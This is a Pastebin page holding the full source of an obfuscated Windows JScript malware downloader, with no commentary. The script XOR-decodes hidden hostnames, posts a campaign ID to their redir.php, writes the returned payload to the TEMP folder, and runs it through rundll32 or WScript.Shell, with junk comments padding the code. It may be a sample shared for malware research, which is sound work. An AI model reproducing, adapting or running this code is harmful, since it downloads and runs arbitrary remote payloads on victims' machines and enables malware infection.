API tools faq
paste
sysopfb

Untitled

sysopfb
Dec 29th, 2015
192
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.50 KB | None | 0 0
raw download clone embed print report
  1. UTUGYMDxlooG8 = "IT2912";
  2.  
  3.  
  4.  
  5. //// BzQ6fVMdKByWs3hu
  6.  
  7. //// fyznFr
  8.  
  9. function UTUGYMDxlooG5(UTUGYMDxlooG6) {
  10.  
  11. return new ActiveXObject(UTUGYMDxlooG6)
  12.  
  13. //// jRNndkN96IM9jwOCIHwf
  14.  
  15. //// IZgVyOoUE4Rs
  16.  
  17. //// FHtwBIjqMmVA7e0j8q
  18.  
  19. //// tLw0puDRYgk3tzJ
  20.  
  21. //// sPMbqLsh
  22.  
  23. //// uW0P5rfG
  24.  
  25. //// setXV4zj
  26.  
  27. //// nxGD7ZN5L0Qchbzk9Cb
  28.  
  29. };
  30.  
  31.  
  32.  
  33. function UTUGYMDxlooG(lsQXeInmlLuos) {
  34.  
  35. var UTUGYMDxlooG4 = '\x00u$\x17$7}\x0dLbZ5\x03yyX###\x0au=\x0858\x09\x7f5\x1e-7\x01\x1a;\x003{F###\x0dn<\x1b:3\x04d\x27|79\x019~###;C\x03|\x1b\x13?@\x11 \x06\x13%W\x1c\x7f\x1f\x19>Q\x15|\x15\x02A>###\x0dx6\x17&5\x04u0|;$\x0b9~###\x01u,\x1f\x27&b{&\x15y|###\x06x=\x1c?%\x01gZ\x11;;A>'.split("###");
  36.  
  37. //// hRcSSv
  38.  
  39. //// kOfJ4ckp3CsY
  40.  
  41. if (lsQXeInmlLuos == "") {
  42.  
  43. detQWoOEMhc = "." + "d" + "l" + "l";
  44.  
  45. } else {
  46.  
  47. detQWoOEMhc = "." + "p" + "d" + "f";
  48.  
  49. };
  50.  
  51. for (var PRmMtdNv = 0; PRmMtdNv < UTUGYMDxlooG4.length; PRmMtdNv++) {
  52.  
  53. var OztWZbKlFGyJEVw = UTUGYMDxlooG5("WScript.Shell");
  54.  
  55. FJVNrliaj = OztWZbKlFGyJEVw.ExpandEnvironmentStrings("%TEMP%") + "\\" + Math.round(1e8 * Math.random()) + detQWoOEMhc;
  56.  
  57. SkpfMZ = false;
  58.  
  59. UTUGYMDxlooG0 = UTUGYMDxlooG5("MSXML2.XMLHTTP");
  60.  
  61. UTUGYMDxlooG0.onreadystatechange = function() {
  62.  
  63. if (4 == UTUGYMDxlooG0.readyState && 200 == UTUGYMDxlooG0.status) {
  64.  
  65. var UTUGYMDxlooG1 = UTUGYMDxlooG5("ADODB.Stream");
  66.  
  67. if (UTUGYMDxlooG1.open(), UTUGYMDxlooG1.type = 1, UTUGYMDxlooG1.write(UTUGYMDxlooG0.ResponseBody), 5e3 < UTUGYMDxlooG1.size) {
  68.  
  69. SkpfMZ = true;
  70.  
  71. UTUGYMDxlooG1.position = 0;
  72.  
  73. UTUGYMDxlooG1.saveToFile(FJVNrliaj, 2);
  74.  
  75. try {
  76.  
  77. if (lsQXeInmlLuos == "") {
  78.  
  79. //// twjL34GzuVTY8z3d
  80.  
  81. //// WLZWy6xhlEzcMwi
  82.  
  83. //// 1DhFjmr2Ho
  84.  
  85. //// cR4de3egKXf
  86.  
  87. OztWZbKlFGyJEVw.Exec("rundll32 " + FJVNrliaj + ", " + "DllRegisterServer");
  88.  
  89. } else {
  90.  
  91. OztWZbKlFGyJEVw.Run(FJVNrliaj, 1, 0);
  92.  
  93. };
  94.  
  95. } catch (UTUGYMDxlooG2) {
  96.  
  97.  
  98.  
  99. };
  100.  
  101. }
  102.  
  103. UTUGYMDxlooG1.close()
  104.  
  105. //// oTxPdOkAW8TqF
  106.  
  107. //// 4kZrcL1l8HkydB1girGd
  108.  
  109. }
  110.  
  111. };
  112.  
  113. try {
  114.  
  115. //// R5k4Z7rdhXLhGd0DGY
  116.  
  117. //// 5fQC0QTW
  118.  
  119. var zWLuoXiVG = 'L4tRtv';
  120.  
  121. var RcLaJvqnj = UTUGYMDxlooG4[PRmMtdNv];
  122.  
  123. for (var hlftAYa = "", KRgdMFtsEwuj6 = 0, KRgdMFtsEwuj7 = 0; KRgdMFtsEwuj6 < RcLaJvqnj.length; KRgdMFtsEwuj6++) hlftAYa += String.fromCharCode(RcLaJvqnj.charCodeAt(KRgdMFtsEwuj6) ^ zWLuoXiVG.charCodeAt(KRgdMFtsEwuj7)), KRgdMFtsEwuj7++, KRgdMFtsEwuj7 == zWLuoXiVG.length && (KRgdMFtsEwuj7 = 0);
  124.  
  125. UTUGYMDxlooG7 = "http://" + hlftAYa + "/redir" + "." + "p" + "h" + "p";
  126.  
  127. UTUGYMDxlooG0.open("POST", UTUGYMDxlooG7, false);
  128.  
  129. UTUGYMDxlooG0.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  130.  
  131. //// QaSBXxSJeSfou9
  132.  
  133. //// h5P2CRS779MX
  134.  
  135. //// U7u3ELOQPUQtVB
  136.  
  137. //// LStv6aB3hMzdGau
  138.  
  139. UTUGYMDxlooG0.send("qQjfq=" + Math.random() + "&jndj=" + UTUGYMDxlooG8 + lsQXeInmlLuos);
  140.  
  141. } catch (UTUGYMDxlooG3) {
  142.  
  143.  
  144.  
  145. };
  146.  
  147.  
  148.  
  149. //// THj9DZeZpue9cL
  150.  
  151. //// XrVQf7znnHLSb9820X
  152.  
  153. if (SkpfMZ) {
  154.  
  155. break;
  156.  
  157. };
  158.  
  159. //// A5IzLsYrdAU1EM0
  160.  
  161. //// hUefQj3Ax
  162.  
  163. };
  164.  
  165. //// v0J2brz
  166.  
  167. //// EG3V0V2yPUR4dQ
  168.  
  169. };
  170.  
  171.  
  172.  
  173. UTUGYMDxlooG("");
  174.  
  175. UTUGYMDxlooG("&ncm=TykItfZAnnMof");
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!